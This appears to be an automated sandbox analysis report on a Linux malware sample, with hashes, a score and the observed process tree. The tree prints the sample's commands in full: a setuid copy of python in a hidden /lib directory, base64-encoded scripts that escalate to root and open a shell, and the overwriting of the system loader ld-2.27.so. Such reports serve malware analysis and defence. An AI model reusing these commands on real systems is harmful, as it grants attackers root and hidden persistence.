Resubmissions
14-07-2022 15:45
220714-s61q8ahdam 1008-07-2022 08:10
220708-j2selsgfep 507-07-2022 21:44
220707-1lxg3afba8 5Analysis
-
max time kernel
0s -
max time network
102s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
submitted
08-07-2022 08:10
General
-
Target
f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
-
Size
870KB
-
MD5
67048a69a007c37f8be5d01a95f6a026
-
SHA1
8e47e49602747f3be4d469a0c573f0362b353b61
-
SHA256
f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8
-
SHA512
21e6e6b330b74528b2b8c050d6b4ca98d87d4a25660f73d6978f688fdf45c9a2da457292af852eae8f8d276ddf297f2d88b00b6f7c8bba0cd05c9272eb64d21b
Score
5/10
Malware Config
Signatures
-
Reads runtime system information 8 IoCs
Reads data from /proc virtual filesystem.
Processes
-
./f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8./f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c81⤵
- Reads runtime system information
-
/bin/shsh -c "mkdir /lib/libntpVnQE6mk"2⤵
-
/bin/mkdirmkdir /lib/libntpVnQE6mk3⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "cp /lib/x86_64-linux-gnu/ld-2.27.so /lib/libntpVnQE6mk/.backup_ld.so"2⤵
-
/bin/cpcp /lib/x86_64-linux-gnu/ld-2.27.so /lib/libntpVnQE6mk/.backup_ld.so3⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "ls -l /lib64/ld-linux-x86-64.so.2"2⤵
-
/bin/lsls -l /lib64/ld-linux-x86-64.so.23⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "chown -R 920366:920366 /lib/libntpVnQE6mk/"2⤵
-
/bin/chownchown -R 920366:920366 /lib/libntpVnQE6mk/3⤵
-
-
-
/bin/shsh -c "mkdir /lib/libntpVnQE6mk/bin; cp /usr/bin/python /lib/libntpVnQE6mk/bin/python; chmod 4755 /lib/libntpVnQE6mk/bin/python"2⤵
-
/bin/mkdirmkdir /lib/libntpVnQE6mk/bin3⤵
- Reads runtime system information
-
-
/bin/cpcp /usr/bin/python /lib/libntpVnQE6mk/bin/python3⤵
- Reads runtime system information
-
-
/bin/chmodchmod 4755 /lib/libntpVnQE6mk/bin/python3⤵
-
-
-
/bin/shsh -c "echo aW1wb3J0IG9zCm9zLnNldHJldWlkKDAsMCkKb3MuZXhlY3YoIi9iaW4vYmFzaCIsICgiL2Jpbi9iYXNoIiwgIi1pIikpCg==|base64 -di > /lib/libntpVnQE6mk/bin/escalator"2⤵
-
/usr/bin/base64base64 -di3⤵
-
-
-
/bin/shsh -c "echo IyEvYmluL2Jhc2gKaWYgWyAiJChpZCAtdSkiIC1uZSAwIF0gOyB0aGVuCiAgIGVjaG8gIldlbGNvbWUgdG8gJChob3N0bmFtZSkuIFlvdSBhcmUgR0lEICQoaWQgLWcpLCBVSUQgJChpZCAtdSkgYW5kIGFib3V0IHRvIGJlIGVzY2FsYXRlZCB0byBVSUQgMC4iCiAgIGV4ZWMgfi9iaW4vcHl0aG9uIH4vYmluL2VzY2FsYXRvcgpmaQpQUzE9J1tcdUBcaCBcV11cJCAnCg==|base64 -di > /lib/libntpVnQE6mk/.profile; chown 920366:920366 /lib/libntpVnQE6mk/.profile; chmod +x /lib/libntpVnQE6mk/.profile;ln -s /lib/libntpVnQE6mk/.profile /lib/libntpVnQE6mk/.bashrc"2⤵
-
/usr/bin/base64base64 -di3⤵
-
-
/bin/chownchown 920366:920366 /lib/libntpVnQE6mk/.profile3⤵
-
-
/bin/chmodchmod +x /lib/libntpVnQE6mk/.profile3⤵
-
-
/bin/lnln -s /lib/libntpVnQE6mk/.profile /lib/libntpVnQE6mk/.bashrc3⤵
-
-
-
/bin/shsh -c "cp -p /lib/x86_64-linux-gnu/ld-2.27.so /lib/lib0UZ0LfvWZ.so"2⤵
-
/bin/cpcp -p /lib/x86_64-linux-gnu/ld-2.27.so /lib/lib0UZ0LfvWZ.so3⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "mv /lib/lib0UZ0LfvWZ.so /lib/x86_64-linux-gnu/ld-2.27.so"2⤵
-
/bin/mvmv /lib/lib0UZ0LfvWZ.so /lib/x86_64-linux-gnu/ld-2.27.so3⤵
- Reads runtime system information
-
-